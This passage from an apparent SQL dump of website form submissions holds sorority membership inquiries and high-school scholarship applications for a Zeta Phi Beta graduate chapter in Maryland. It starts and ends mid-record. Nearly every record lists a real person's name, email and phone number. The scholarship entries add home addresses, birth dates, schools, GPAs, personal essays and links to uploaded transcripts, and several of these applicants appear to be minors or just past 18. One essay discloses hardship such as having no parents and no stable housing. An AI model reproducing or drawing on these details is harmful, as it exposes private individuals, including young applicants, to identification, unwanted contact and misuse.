considered? Thanks, Lanaya Jones'),(4223,364,10,1.3,'Shelly'),(4224,364,10,1.6,'Amos'),(4225,364,10,3,'shelly.amos@outlook.com'),(4226,364,10,5,'(858) 717-3303'),(4227,364,10,2,'Interested in Membership'),(4228,364,10,4,'Hi,  Interested in joining the Grad Chapter of the Zeta Phi Beta.  I have a degree in Health Information Management and currently work on my Masters in Healthcare Leadership.'),(4229,365,7,1.3,'Fayha'),(4230,365,7,1.6,'Gholston'),(4231,365,7,2,'mjgholston@gmail.com'),(4232,365,7,3,'Amicette Club'),(4233,365,7,4,'Hello Sorors,\r\n\r\nMy name is Melissa Fleming.  I am a member of Tau Delta Zeta chapter in PG county.  My family lives in Howard County in Columbia MD and my youngest daughter, who is 11, is interested in Amicette club.  Can you please provide us with more information regarding the auxiliary and how she can gain membership. Thanks.\r\n\r\nSoror Fleming'),(4234,366,10,1.3,'Melissa'),(4235,366,10,1.6,'Fleming'),(4236,366,10,3,'mjgholston@gmail.com'),(4237,366,10,5,'(240) 593-3334'),(4238,366,10,2,'Current Active Member (Transfer)'),(4239,366,10,4,'Hello Soror Williams,\r\n\r\nI hope this finds you well.  My name is Melissa Fleming and I became a member of Zeta Phi Beta in the Spring of 1993 at YM, Towson University. I have recently been reclaimed through the Tau Delta Zeta chapter.  However, in the long run I may consider transfer to Lambda Gamma Zeta due to proximity. I live in Howard County. I would love to come visit a chapter meeting. Would that possible?  \r\n\r\nThank you. I look forward to hearing from you.\r\n\r\nMelissa'),(4240,367,10,1.3,'Sherry'),(4241,367,10,1.6,'Golden'),(4242,367,10,3,'Sherrygolden76@gmail.com'),(4243,367,10,5,'(443) 722-6118'),(4244,367,10,2,'Interested in Membership'),(4245,367,10,4,'I am interested in membership and wanted to know your next informational session.'),(4246,368,10,1.3,'Jordan'),(4247,368,10,1.6,'Smith'),(4248,368,10,3,'Jjsmith4613@gmail.com'),(4249,368,10,5,'(667) 203-1194'),(4250,368,10,2,'Interested in Membership'),(4251,369,10,1.3,'Schira'),(4252,369,10,1.6,'Madan'),(4253,369,10,3,'sdtate@gmail.com'),(4254,369,10,5,'(240) 472-0078'),(4255,369,10,2,'Inactive Member (Reclaim)'),(4256,369,10,4,'I joined Zeta as an undergraduate in 1999 with Alpha Chapter, though I was the first initiate into the Sigma Pi chapter at American University under the advisement and sponsorship of Beta Zeta graduate chapter. I am looking to join a new graduate chapter after being inactive for many years. Not to mention that I just realized that Soror Cherice Daniels and I attend the same church! \r\n\r\nI look forward to hearing back from someone soon. \r\n\r\nThank you.'),(4257,370,10,1.3,'Cynthia'),(4258,370,10,1.6,'Hutcherson'),(4259,370,10,3,'ckhomaha@gmail.com'),(4260,370,10,5,'(443) 766-4978'),(4261,370,10,2,'Inactive Member (Reclaim)'),(4262,370,10,4,'Dear VP Lillet Williams, I\'m Interested in becoming an active member again to participate in community events. However, I\'m unsure of how to do so.  I graduated from the University of Nebraska at Lincoln in the summer of 1983.  BS in Textiles, Clothing  & Design.  Currently, I sub teach in Howard County Public Schools here in Howard County, Maryland. I began my teaching career at Bethel Christian Academy in Savage, MD & taught four years in Baltimore City Public Schools.  Please be so kind to advise me on the necessary steps of returning .  Thanking you in advance for any help you can offer. Looking forward to hearing from you soon.   \r\nBlessings,  Cynthia Hutcherson'),(4263,371,10,1.3,'Sherell'),(4264,371,10,1.6,'Morgan'),(4265,371,10,3,'morganlyric86@gmail.com'),(4266,371,10,5,'(713) 396-6971'),(4267,371,10,2,'Interested in Membership'),(4268,372,10,1.3,'La Tanya'),(4269,372,10,1.6,'Corpening'),(4270,372,10,3,'ltcorpening@gmail.com'),(4271,372,10,5,'(202) 422-4956'),(4272,372,10,2,'Inactive Member (Reclaim)'),(4273,372,10,4,'Good Afternoon,\r\n\r\nI\'m interested in becoming an active member of the chapter again.  You can contact me either by phone or email.\r\n\r\nThank you.'),(4274,373,10,1.3,'Lanaya'),(4275,373,10,1.6,'Jones'),(4276,373,10,3,'joneslan06@gmail.com'),(4277,373,10,5,'(910) 591-9248'),(4278,373,10,2,'Interested in Membership'),(4279,373,10,4,'I am interested in joining Zeta Phi Beta sorority graduate chapter.  Are there any new member information sessions scheduled in the near future? Thanks, Lanaya Jones'),(4280,374,10,1.3,'Shondriette'),(4281,374,10,1.6,'Kelley'),(4282,374,10,3,'Msesquire77@gmail.com'),(4283,374,10,5,'(301) 996-1931'),(4284,374,10,2,'Inactive Member (Reclaim)'),(4285,375,10,1.3,'Dawnielle'),(4286,375,10,1.6,'Eldridge'),(4287,375,10,3,'Dawnielle.eldridge@gmail.com'),(4288,375,10,5,'(240) 917-1148'),(4289,375,10,2,'Interested in Membership'),(4290,375,10,4,'Currently seeking in your chapter'),(4291,376,10,1.3,'Breanna'),(4292,376,10,1.6,'McKenley'),(4293,376,10,3,'bmckenley@gmail.com'),(4294,376,10,5,'(716) 563-3659'),(4295,376,10,2,'Interested in Membership'),(4296,377,6,18.3,'Chelsea'),(4297,377,6,18.6,'Baker'),(4298,377,6,19.1,'13422 Good Times Court'),(4299,377,6,19.3,'Highland'),(4300,377,6,19.4,'MD'),(4301,377,6,19.5,'20777'),(4302,377,6,19.6,'United States'),(4303,377,6,4,'03-10-02'),(4304,377,6,21,'chelsea.baker310@gmail.com'),(4305,377,6,20,'(443) 820-8867'),(4306,377,6,10,'River Hill High School'),(4307,377,6,27,'Friend/Family Member'),(4308,377,6,28,'N/A'),(4309,377,6,9,'3.95'),(4310,377,6,26,'Economics'),(4311,377,6,12,'NA'),(4312,377,6,14,'Delta Scholars, 3 years, co-president (12)\r\nHawks Fight Hunger, 2 years, president (11, 12)\r\nHawk Help Tutoring, 2 years (11, 12)\r\nNational Honor Society, 2 years (11, 12)\r\nStudent Government Association, 2 years (9, 10)\r\nPrincipal Advisory Council, 1 year (12)'),(4313,377,6,13,'Principal\'s Honor Roll (10, 11, 12)\r\nGold Honor Roll (9)\r\nAcademic Excellence in Computer Science A AP (11)\r\nAcademic Excellence in Statistics AP (11)\r\nMinds in Motion (9, 10, 11, 12)\r\nTeen Academic Award for Distinguished Scholastic Merit, Jack & Jill Teen Conference (10)'),(4314,377,6,36,'Food on the 15th - The organization collects and donates non-perishable food items to donate to economically challenged senior citizens around Howard County. I actively participate in the organization and started a club at my school to aid in collecting and moving food.\r\nCorduroy\'s Closet - Annual community service event hosted by Jack & Jill Columbia, MD Chapter during December.  We set up a \"store\" for underprivileged kids to \"purchase\" donated Christmas gifts for their loved ones. \r\nHawk Help - Through National Honor Society, I tutor kids struggling in classes I previously took after school whenever necessary for them.'),(4315,377,6,37,'Harvard University\r\nUniversity of Maryland College Park\r\nColumbia University\r\nGeorgia Institute of Technology\r\nSpelman College'),(4316,377,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/01/conway-scholarship.pdf'),(4317,377,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/01/unofficial-transcript.pdf'),(4318,377,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/01/Baker-Zeta-photo-release.pdf'),(4319,378,6,18.3,'Darlene'),(4320,378,6,18.6,'Kessie'),(4321,378,6,19.1,'7037 Holly Springs Ln'),(4322,378,6,19.3,'Elkridge'),(4323,378,6,19.4,'Maryland'),(4324,378,6,19.5,'21075'),(4325,378,6,19.6,'United States'),(4326,378,6,4,'11/11/01'),(4327,378,6,21,'darlenekess8@gmail.com'),(4328,378,6,20,'(240) 713-2692'),(4329,378,6,10,'Long Reach High School'),(4330,378,6,27,'BSAP Advisor'),(4331,378,6,28,'N/A'),(4332,378,6,9,'3.5'),(4333,378,6,26,'Neuroscience & Political Science'),(4334,378,6,12,'n/a'),(4335,378,6,14,'National Honors Society\r\nDelta Scholars\r\nAfrican Student Association'),(4336,378,6,13,'2017- Present: Honor Roll for Maintaining a GPA over a 3.5\r\n2017-2018 :Student Athlete Award- Maintained 3.0+ GPA'),(4337,378,6,36,'-Sarah’s House Shelter — Tutor\r\nJanuary 2018 - PRESENT\r\n● Assisting elementary school-aged students with homework after school. Working with parents in order to better understand\r\nthe needs of their child to help them improve in areas such as math, English and writing.\r\n● Providing personal care for toddlers such as feeding, changing diapers and providing entertainment.\r\n-Brooke Grove Retirement Village — Volunteer Geriatric Assistant\r\nSeptember 2019-PRESENT\r\n Assisted residents with basic needs such as transport to appointments, cleaning, feeding and other needs upon request.\r\n-Animal Welfare Society — Animal Attendant\r\nSeptember 2018 - May 2019\r\nFollowed proper sanitary procedures within the shelter to ensure the health and safety of all animals.\r\n Provided companionship to animals to foster a positive environment and help them quickly adjust to human interaction.'),(4338,378,6,37,'NYU, Pace Uni, Spelman, UMBC, Loyola Uni'),(4339,378,6,41,'About what are you most curious and how might a college education set you on a course to new adventures to satisfy your curiosity?\r\n\r\nIn a world where I have various paths to choose from, I constantly felt in a state of indecision. As I\'ve grown and received advice from older family members, I learned that it was more than okay to have multiple interests. This gave me the decision to focus on two possible directions, and then build upon the rest of my interests as my life goes on. I found myself extremely interested in the way people acted and how their minds worked, and anything pertaining to psychiatry has always piqued my curiosity and I’ve taken the courses in high school to learn more. In addition to this, I am also curious about the government and how people in power operate. I feel that getting a college education will allow me to truly explore both of these fields. Every school that I am trying to attend offers me great programs in order to reach these goals. In college, I plan on majoring in neuroscience and minoring in political science. New York University is my top school because they offer a program solely for psychiatry, unlike schools offering regular psychology. I think that being able to major in exactly what I’ve been searching for would motivate me in pursuing the career that I want. On top of being able to study what I would like to focus on now, the new environment will allow me to learn more about people, and experience life outside of high school. I know that in the interest of personal growth, I need to be well-rounded as not only a student but also as a person in society. Being able to go to a college outside of the world I know would push me out of my comfort zone so that I would grow academically as well as socially. Getting that kind of education without the financial burden would benefit my family and I greatly.'),(4340,378,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Scan.pdf'),(4341,378,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/LGZScholarshipReleaseForm.pdf'),(4342,378,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/LGZScholarshipReleaseForm1.pdf'),(4343,379,6,18.3,'Serena'),(4344,379,6,18.6,'Walker'),(4345,379,6,19.1,'5939 Fairlee Rd'),(4346,379,6,19.3,'Elkridge'),(4347,379,6,19.4,'Maryland'),(4348,379,6,19.5,'21075'),(4349,379,6,19.6,'United States'),(4350,379,6,4,'01-27-02'),(4351,379,6,21,'Serenawalker80@gmail.com'),(4352,379,6,20,'(443) 905-1750'),(4353,379,6,10,'Howard High School'),(4354,379,6,27,'Friend/Family Member'),(4355,379,6,28,'N/A'),(4356,379,6,9,'4.0'),(4357,379,6,26,'Theatre'),(4358,379,6,12,'NA'),(4359,379,6,14,'None'),(4360,379,6,13,'Honor Roll 2016, 2017, 2018, 2019\r\nPrincipals Honor Roll 2019'),(4361,379,6,36,'Volunteering with 4th and 5th grade kids at Bridgeway Community Church from 2017 to present day 2020.'),(4362,379,6,37,'UMBC, Towson, George Mason, Virginia Commonwealth'),(4363,379,6,41,'Essay D: In the children’s book Curious George, George the chimp learns about the world around him by exploring new adventures. About What are you most curious and how might a college education set you on a course to new adventures to satisfy your curiosities? \r\nI am most curious about and learning to live life on my own, experiencing different cultures, and becoming an expert in my field of choice. \r\nAfter spending the last eighteen years of my life living under my parents wing, I cannot wait to step out into the big world and experience life on my own. One of the aspects of young adulthood is living with a roommate. I will be learning very important life skills like interacting with neighbors, and getting to know others in the common areas. This is the first time since elementary school that I will truly be starting over. I will be in an unfamiliar environment where I know no one. It is frightening and exhilarating all at the same time. \r\nGrowing up in a multicultural environment, I’ve learned so much from friends and neighbors who are different from me. There is so much history and so many more stories to discover. College will give me the opportunity and the resources to explore other people’s points of view by exploring the world through my education. The colleges I have applied to have study abroad programs so I can embark on an international journey and discover the different points of view of people all over the world. I won’t just be reading about the culture, I’ll be experiencing it. \r\nCollege will also help me cultivate my creative talents in the world of theater. I will be attending school next fall getting my bachelors degree in fine arts. I am so excited to dive into the world of my future profession. For the first time ever I will be able to devote my time and energy to something I am passionate about. \r\nI would like to experience living on my own, explore other cultures through study abroad programs, and dive into the world of theater. College will allow me to accomplish those goals. I cannot wait for my journey to begin!'),(4364,379,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Q2-Report-Card.pdf'),(4365,379,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Photo-release-form.docx'),(4366,379,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Scholar-photo.docx'),(4367,380,10,1.3,'Marquita'),(4368,380,10,1.6,'Monroe'),(4369,380,10,3,'Marquitamonroe@me.com'),(4370,380,10,5,'(240) 478-6378'),(4371,380,10,2,'Current Active Member (Transfer)'),(4372,381,6,18.3,'Audrey'),(4373,381,6,18.6,'Mullins'),(4374,381,6,19.1,'2931 Pebble Beach Drive'),(4375,381,6,19.3,'Ellicott City'),(4376,381,6,19.4,'MD'),(4377,381,6,19.5,'21042'),(4378,381,6,19.6,'United States'),(4379,381,6,4,'10/4/2001'),(4380,381,6,21,'a.simone2001@gmail.com'),(4381,381,6,20,'(217) 971-8713'),(4382,381,6,10,'Marriotts Ridge High School'),(4383,381,6,27,'Friend/Family Member'),(4384,381,6,28,'N/A'),(4385,381,6,9,'3.7'),(4386,381,6,26,'Business Marketing'),(4387,381,6,12,'6 credits'),(4388,381,6,14,'Delta Scholars. 3 years of membership. (president)\r\nMadrigal Chamber Choir. 2 years of membership. \r\nIndoor and Outdoor Track and Field. 4 years of membership. (captain)\r\nBlack Student Union. 4 years of membership. (secretary) \r\nNational Honor Society. 2 years of membership.\r\nHOCO teen Interfaith Organization. 3 years of membership. (youth member of the board)\r\nSt. John Baptist Church Choir. 6 years of membership. (youth leader of the church and alto section leader)'),(4389,381,6,13,'Black Student Achievement Award\r\nPrincipal\'s honor roll\r\nScholar Athlete Award\r\nCoaches Award\r\nCaptain\'s Award'),(4390,381,6,36,'Through the madrigals, we sing at many community events to spread cheer through the power of song and music. Through the 2019  holiday season we sang at nursing homes, and teacher appreciation luncheons to spread Holiday cheer and show our gratitude to retired educators. \r\nParticipated in grassroots food drive. 9/27/2019 and 11/1/2020 through National Honor Society.'),(4391,381,6,37,'University of Maryland College Park\r\nSpelman College\r\nHoward University'),(4392,381,6,41,'I am very curious about the different cultures in the world and how they are similar and/or different from our everyday lives. Through my studies of the French language and culture for 5 years, I became very fascinated with the “norm” of their everyday lives. For example, students have a 2-hour break for lunch everyday where they can go to restaurants, do homework, go home, instead of lunch built into the school day like in Howard County. Also, high school student’s regular schedule favors that of college, where students have different classes every day for longer periods, but their weekly schedule remains the same. I have a strong desire to now visit this amazing country and immerse myself into their culture. With that, try authentic French cuisine and try new foods, despite my picky appetite. However, I don\'t want it to stop there. This course has broadened my horizon to now want to visit as many places and learn about as many cultures as I can in my lifetime. The world is such a beautiful place filled with different cultures, foods, music and I want to experience it for myself. My father especially has traveled to many countries and told me so much about his experiences and the expressed cultural differences. He recently traveled to South Africa and the pictures he showed me of the mountains and beaches were absolutely breath-taking. Through his visit to local townships, I was able to see the artwork and children playing in the streets with infectious and joyous smile upon their faces through just playing with one another. Through my college career and education I plan on using this amazing opportunity to study abroad and take courses that allow me to learn about other countries and cultures. With the knowledge that some countries are not as fortunate as us and my love for community service, I want to volunteer my time and resources to give back in any capacity to areas of the world that are less fortunate that I am so I can not only learn about new cultures, but do my part to help suffering communities in the world.'),(4393,381,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/transcrpit.docx'),(4394,381,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/photo-release.docx'),(4395,381,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/photo.docx'),(4396,382,6,18.3,'Audrey'),(4397,382,6,18.6,'Mullins'),(4398,382,6,19.1,'2931 Pebble Beach Drive'),(4399,382,6,19.3,'Ellicott City'),(4400,382,6,19.4,'MD'),(4401,382,6,19.5,'21042'),(4402,382,6,19.6,'United States'),(4403,382,6,4,'10/4/2001'),(4404,382,6,21,'a.simone2001@gmail.com'),(4405,382,6,20,'(217) 971-8713'),(4406,382,6,10,'Marriotts Ridge High School'),(4407,382,6,27,'Friend/Family Member'),(4408,382,6,28,'N/A'),(4409,382,6,9,'3.7'),(4410,382,6,26,'Business Marketing'),(4411,382,6,12,'6 credits'),(4412,382,6,14,'Delta Scholars. 3 years of membership. (president)\r\nMadrigal Chamber Choir. 2 years of membership. \r\nIndoor and Outdoor Track and Field. 4 years of membership. (captain)\r\nBlack Student Union. 4 years of membership. (secretary) \r\nNational Honor Society. 2 years of membership.\r\nHOCO teen Interfaith Organization. 3 years of membership. (youth member of the board)\r\nSt. John Baptist Church Choir. 6 years of membership. (youth leader of the church and alto section leader)'),(4413,382,6,13,'Black Student Achievement Award\r\nPrincipal\'s honor roll\r\nScholar Athlete Award\r\nCoaches Award\r\nCaptain\'s Award'),(4414,382,6,36,'Through the madrigals, we sing at many community events to spread cheer through the power of song and music. Through the 2019  holiday season we sang at nursing homes, and teacher appreciation luncheons to spread Holiday cheer and show our gratitude to retired educators. \r\nParticipated in grassroots food drive. 9/27/2019 and 11/1/2020 through National Honor Society.'),(4415,382,6,37,'University of Maryland College Park\r\nSpelman College\r\nHoward University'),(4416,382,6,41,'I am very curious about the different cultures in the world and how they are similar and/or different from our everyday lives. Through my studies of the French language and culture for 5 years, I became very fascinated with the “norm” of their everyday lives. For example, students have a 2-hour break for lunch everyday where they can go to restaurants, do homework, go home, instead of lunch built into the school day like in Howard County. Also, high school student’s regular schedule favors that of college, where students have different classes every day for longer periods, but their weekly schedule remains the same. I have a strong desire to now visit this amazing country and immerse myself into their culture. With that, try authentic French cuisine and try new foods, despite my picky appetite. However, I don\'t want it to stop there. This course has broadened my horizon to now want to visit as many places and learn about as many cultures as I can in my lifetime. The world is such a beautiful place filled with different cultures, foods, music and I want to experience it for myself. My father especially has traveled to many countries and told me so much about his experiences and the expressed cultural differences. He recently traveled to South Africa and the pictures he showed me of the mountains and beaches were absolutely breath-taking. Through his visit to local townships, I was able to see the artwork and children playing in the streets with infectious and joyous smile upon their faces through just playing with one another. Through my college career and education I plan on using this amazing opportunity to study abroad and take courses that allow me to learn about other countries and cultures. With the knowledge that some countries are not as fortunate as us and my love for community service, I want to volunteer my time and resources to give back in any capacity to areas of the world that are less fortunate that I am so I can not only learn about new cultures, but do my part to help suffering communities in the world.'),(4417,382,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/transcrpit1.docx'),(4418,382,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/photo-release1.docx'),(4419,382,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/photo1.docx'),(4420,383,6,18.3,'Mikhi'),(4421,383,6,18.6,'Kelly'),(4422,383,6,19.1,'5646 Stevens Forest Road'),(4423,383,6,19.3,'Columbia'),(4424,383,6,19.4,'Maryland'),(4425,383,6,19.5,'21045'),(4426,383,6,19.6,'United States'),(4427,383,6,4,'08/21/2002'),(4428,383,6,21,'mikhikel@gmail.com'),(4429,383,6,20,'(301) 693-9758'),(4430,383,6,10,'Oakland Mills High School'),(4431,383,6,27,'BSAP Advisor'),(4432,383,6,28,'N/A'),(4433,383,6,9,'3.5'),(4434,383,6,26,'Business'),(4435,383,6,12,'NA'),(4436,383,6,14,'Alpha Achievers \r\n2 Years \r\nMember'),(4437,383,6,13,'Honor Roll 2018-Present \r\nPrincipal Honor Roll 2020'),(4438,383,6,36,'N/A'),(4439,383,6,37,'Howard University \r\nUMD College Park \r\nSalisbury University'),(4440,383,6,38,'Everyone has a very unique story to tell; I come from a past of struggle and hardship that inevitably made me a much more humble person overall. Being intrigued by others’ narratives, especially people within my own community, has moved me into believing that we should bring light to conflicts and topics that may be controversial. Simply by removing the lens of ignorance through educating people, using my love for photography as a medium, I strongly believe my art could bring people from all different cultural/ethnic backgrounds together. I hope that one day my passion for art will ensue change and allow people to accept and love everyone. \r\nBeing another kid, parentless, moving with no stable housing, society would label me as an outcast. Another kid with emotional trauma, getting into trouble and not doing well within school. Already being a statistic, there are only two outcomes for minorities as myself; prison or death. Except for me. \r\nMe, who truly wants the best for themselves despite their upbringing, who are fully capable of doing good and producing good that will hold substance later in my life. Being quite successful in school by maintaining an unweighted 3.5 gpa, challenging myself with multiple AP classes, while still being able to maintain an afterschool job, it paved a way for a very bright future of mine. \r\nI’ve personally diverged from society’s expectations and hope that my art will expose others like myself. A college education will allow me to continue to fight against society’s expectations while giving me the opportunity to not only sharpen my skills in photography but give me the tools to start my own business, inevitably meeting people along the way that will help me make my art a reality. The path I want to take is to compare human evolution to individual evolution of people with similar upbringings as myself to document that life doesn’t have to end with prison or death due to your past.'),(4441,383,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/W.-Ruth-Conway-Scholarship-Essay.pdf'),(4442,383,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/M-Kelly-transcript.pdf'),(4443,383,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/LGZScholarshipReleaseForm-1.pdf'),(4444,384,6,18.3,'Kamau'),(4445,384,6,18.6,'Richardson'),(4446,384,6,19.1,'11902 Blue February Way'),(4447,384,6,19.3,'Columbia'),(4448,384,6,19.4,'Maryland'),(4449,384,6,19.5,'21044'),(4450,384,6,19.6,'United States'),(4451,384,6,4,'05-24-02'),(4452,384,6,21,'kamaurich13@gmail.com'),(4453,384,6,20,'(929) 288-3654'),(4454,384,6,10,'Atholton High School'),(4455,384,6,27,'BSAP Advisor'),(4456,384,6,28,'N/A'),(4457,384,6,9,'3.4'),(4458,384,6,26,'Cehmical Engineering & Biology'),(4459,384,6,12,'NA'),(4460,384,6,14,'National Honors Society 2018-2020(Current)\r\nFrench Honors Society 2019-2020(Current)\r\nAlpha Achievers 2016-2020(Current):Vice President of Membership/Fundraising, President\r\nArmy JROTC 2016-2020(Current): Company Executive Office, Battalion Commander'),(4461,384,6,13,'Honor  Roll 2017-2020(Current)\r\nNational Honors Society 2018-2020(Current)\r\nFrench Honors Society 2019-2020(Current)\r\nArmy Instructor\'s Award\r\nSuperior Cadet Award'),(4462,384,6,36,'Howard County Black History Exposition--Feb. 21, 2018\r\nSamaritan\'s Purse Operation Christmas Child Dec. 14, 2017\r\nTimberlane Drain Stenciling--July 21, 2018\r\nCold Weather Shelter (Merriweather Post Pavilion)--Dec. 1, 2018\r\nAtholton High School Army JROTC Best of the Best Drill Competition--Dec. 7, 2019\r\nWreaths Across America-- Dec.14, 2019\r\nBuffalo Soldier Pinning Ceremony Mt. Ephraim Baptist Church--Feb. 7, 2020'),(4463,384,6,37,'Howard University\r\nHampton\r\nUniversity of Maryland Baltimore County\r\nNorth Carolina Agricultural and Technical University'),(4464,384,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Ruth-Conway-Scholarship-Essay.docx'),(4465,384,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Kamau-Transcript.pdf'),(4466,384,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/Feb-19-Doc-1.pdf'),(4467,385,6,18.3,'Thandi'),(4468,385,6,18.6,'Romney'),(4469,385,6,19.1,'12403 Penelope Ct'),(4470,385,6,19.3,'Fulton'),(4471,385,6,19.4,'MD'),(4472,385,6,19.5,'20759-9644'),(4473,385,6,19.6,'United States'),(4474,385,6,4,'06-17-2002'),(4475,385,6,21,'drvallen@verizon.net'),(4476,385,6,20,'(240) 271-3824'),(4477,385,6,10,'Reservoir High School'),(4478,385,6,27,'Friend/Family Member'),(4479,385,6,28,'N/A'),(4480,385,6,9,'3.57'),(4481,385,6,26,'Sports Medicine'),(4482,385,6,12,'NA'),(4483,385,6,14,'Reservoir Marching Band, 4 years, Section Leader\r\nReservoir Symphonic Band  4 years, First chair, Section leader\r\nReservoir Cross Country Team, Track and Field, 3 years, Team Co-Captain'),(4484,385,6,13,'National Honor Society 2018\r\nNational Music Society 2018\r\nScholar Athlete 2017-2020'),(4485,385,6,36,'Bridgeway Community Church , Bridge kids, teachers assistant, 2014-2016\r\nBridgeway Community Church, Community Cupboard, greeter/registrar, 2017-present'),(4486,385,6,37,'Delaware University\r\nJames Madison University\r\nUniversity of Maryland, College Park'),(4487,385,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/thandi-zeta-essay.docx'),(4488,385,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/thandi-transcript.pdf'),(4489,385,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/02/thandi-photo-release.pdf'),(4490,386,6,18.3,'Jeffrey'),(4491,386,6,18.6,'Sims'),(4492,386,6,19.1,'8659 stonecutter road'),(4493,386,6,19.3,'Columbia'),(4494,386,6,19.4,'Maryland'),(4495,386,6,19.5,'21045'),(4496,386,6,19.6,'United States'),(4497,386,6,4,'11/02/01'),(4498,386,6,21,'simsjeffrey2104@icloud.com'),(4499,386,6,20,'(410) 567-6369'),(4500,386,6,10,'Long Reach High School'),(4501,386,6,27,'BSAP Advisor'),(4502,386,6,28,'N/A'),(4503,386,6,9,'3.3'),(4504,386,6,26,'Economics'),(4505,386,6,12,'6 (because of duel enrollment), counting AP classes 30'),(4506,386,6,14,'English National Honor Society (11/2019 – Present)\r\nMember\r\nNational Honor Society (11/2018 – Present)\r\nWarden of Scholarship\r\nLong Reach Speech and Debate Team (11/2018 – Present)\r\nMember (Debate)\r\nSocial Studies National Honor Society (11/2018 – Present)\r\nMember\r\nScience National Honor Society (11/2018 – Present)\r\nCommunications Liaison\r\nLong Reach Association for Gender Equality (10/2018 – Present)\r\nPresident/Founder\r\nAlpha Achievers (09/2016 – Present)\r\nMember\r\nBlack Student Union (09/2016 – Present)\r\nMember'),(4507,386,6,13,'AP Scholar (2019 – Present)\r\nScored an average of a 3.5 on 3 or more AP exams\r\nNAACP Council of Elders Academic Achievement Award (2016 – Present)\r\nAward given to students who maintained an A/B average throughout the academic year'),(4508,386,6,36,'English National Honor Society (11/2019 – Present)\r\nTutoring students in English classes as well as helping students revise papers and prepare for the SAT and midterms.\r\nNational Honor Society (11/2018 – Present)\r\nCoordinating after school tutoring for all National Honor Society members, as well as mentoring and tutoring students in all subjects and preparing students for the SAT and midterms. Also volunteering for many community service initiatives, such as job fairs and mentoring.\r\nSocial Studies National Honor Society (11/2018 – Present)\r\nTutoring students in Social Studies classes as well as helping students prepare for the SAT and midterms.\r\nScience National Honor Society (11/2018 – Present)\r\nTutoring students in Science classes as well as helping students prepare for the SAT and midterms. Also participating in community service initiatives like trash clean-ups.\r\nAlpha Achievers (09/2016 – Present)\r\nVolunteering for many community service initiatives, such as job fairs, tutoring, clothing/food drives, and mentoring elementary school children at local schools.'),(4509,386,6,37,'Cornell University\r\nGeorgetown University\r\nUniversity of Pennsylvania'),(4510,386,6,40,'Essay C. In the movie Avengers: The End Game, the Avengers must defeat Thanos the evil demigod. What societal issue(s) do you most want to defeat (or help address) and how might a college education best equip you to engage in the issue(s)?\r\n\r\nEducation to me is an opportunity, and to be educated is to be able to educate others. Throughout my childhood, education has been stressed to me by my parents as a means to uplift myself and others, a philosophy to which I have come to wholeheartedly subscribe. I believe being educated is a goal that everyone should strive to achieve and we should never really stop learning. I do not view education as just something one might learn in a class or read in a textbook. For me, to be educated isn’t just about graduating and earning a degree either; it is a more comprehensive understanding of self and the broader society.\r\n At the four-year University that I plan on attending this fall, I will be majoring in economics, and will then go on to graduate school to subsequently become an attorney. With knowledge of the law as well as the economy I feel like I will be best equipped to address a social issue that is very important to me, that being economic inequality as well as the systematic oppression of minorities. I personally have always believed that (although protesting and creating awareness for issues can make a positive impact) in order to have a more absolute, long lasting solution we must empower our community through the acquisition of wealth. With knowledge of the economy as well as an understanding of our legal system I will be able to help teach individuals fiscal responsibility as well as how to navigate the pitfalls of our legal system that has been designed to keep them oppressed.'),(4511,386,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Essay-C.pdf'),(4512,386,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Unofficial-Transcript.docx'),(4513,386,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/LGZScholarshipReleaseForm.pdf'),(4514,387,6,18.3,'Rachel'),(4515,387,6,18.6,'Carver'),(4516,387,6,19.1,'9418 Madison 